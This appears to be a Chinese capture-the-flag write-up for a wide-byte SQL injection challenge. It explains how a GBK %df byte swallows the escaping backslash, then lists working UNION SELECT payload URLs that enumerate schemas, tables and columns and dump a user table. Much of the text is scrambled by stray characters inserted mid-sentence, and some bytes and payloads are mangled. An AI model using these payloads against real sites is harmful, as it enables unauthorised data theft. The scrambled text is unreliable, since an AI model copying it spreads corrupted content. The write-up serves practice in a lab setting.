防注入分值: 300
小明終于知道敬惦,原來(lái)黑客如此的吊神凑,還有sql注入這種高端技術(shù)谣膳,因此他開始學(xué)習(xí)防注入竿报!
老辦法,沒有信息就看F12唄
html里面有一個(gè)tip? id=1?
ok 知道該怎么做了? http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id=1
然后嘗試來(lái)一個(gè)單引號(hào) '??
界面不行了继谚,啥也沒有烈菌,說(shuō)明waf過(guò)濾了單引號(hào),
這個(gè)時(shí)候就要考慮到用寬字節(jié)%df繞過(guò)
經(jīng)測(cè)試花履,只要是寬字節(jié)都可以比如使用%e0芽世。
ascii碼大于127的均為寬子節(jié)
這里略帶一提
該漏洞最早2006年被國(guó)外用來(lái)討論數(shù)據(jù)庫(kù)字符集設(shè)為GBK時(shí),0xbf27本身不是一個(gè)有效的GBK字符诡壁,但經(jīng)過(guò)? addslashes()
轉(zhuǎn)換后變?yōu)?xbf5c27济瓢,前面的0xbf5c是個(gè)有效的GBK字符,所以0xbf5c27會(huì)被當(dāng)作一個(gè)字符0xbf5c和一個(gè)單引號(hào)來(lái)處理妹卿,結(jié)果漏洞就觸發(fā)了
也就是說(shuō):%df\’ = %df%5c%27=縗’旺矾,有了單引號(hào)就好注入了
GBK編碼蔑鹦,它的編碼范圍是0x8140~0xFEFE(不包括xx7F),在遇到%df(ascii(223)) >ascii(128)時(shí)自動(dòng)拼接%5c宠漩,因此吃掉‘\’举反,
在這里 %5c就是‘\’
%df在碰到%5c后,會(huì)被拼接在一起變成
而%27扒吁、%20小于ascii(128)的字符就保留了火鼻。
若有些關(guān)于unicod,utf-8雕崩,gbk魁索,之類的不清楚的可以查一下知乎以及? http://www.91ri.org/8611.html
我們?cè)谳斎肓?/p>
?id=2%df%27%20order%20by%203%23
實(shí)際上等于?id=2%df' order by 3#
?id=2%df%27%20order%20by%204%23
之后,可以判斷出盼铁,字段數(shù)為3?
then
lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id=2%df%27%20UNION%20SELECT%201,2,3%23
接下去按著前一篇文章慢慢來(lái)
http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id=2%bf%27%20union%20select%201,concat(group_concat(distinct+schema_name)),3%20from%20information_schema.schemata%23
這個(gè)url有點(diǎn)長(zhǎng)啊粗蔚。。饶火。主要用到的是concat(group_concat(distinct+schema_name))
至于每個(gè)函數(shù)的功能自己查吧
然后就是自己翻? ? ?用這個(gè)
concat(group_concat(distinct+table_name))
打開mydbs
別打開test了鹏控。。肤寝。我已經(jīng)打開過(guò)了当辐。里面啥都沒有!鲤看!
next
http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id=2?' union select 1,concat(group_concat(distinct+column_name )),3 from information_schema.columns where table_name=0x7361655F757365725F73716C6934#
勝利就在前方T稻尽!义桂!
http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id=2?' union select 1,concat(group_concat(id,0x3a,title_1,0x3a,content_1)),3 from sae_user_sqli4 #
OK了找筝,這兩道題的套路都還差不多了,希望大家多熟悉熟悉